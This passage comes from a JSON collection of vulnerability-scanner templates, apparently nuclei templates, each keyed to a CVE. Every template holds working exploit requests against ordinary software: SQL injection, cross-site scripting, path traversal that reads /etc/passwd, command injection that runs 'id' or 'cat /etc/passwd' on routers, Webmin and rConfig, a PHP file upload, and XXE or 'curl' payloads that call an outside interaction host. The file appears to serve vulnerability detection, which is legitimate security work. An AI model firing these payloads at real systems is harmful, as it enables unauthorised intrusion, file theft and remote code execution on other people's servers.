name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-28023","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_supplier HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]}]}
\ No newline at end of file
+{"templates":[{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers":[{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: 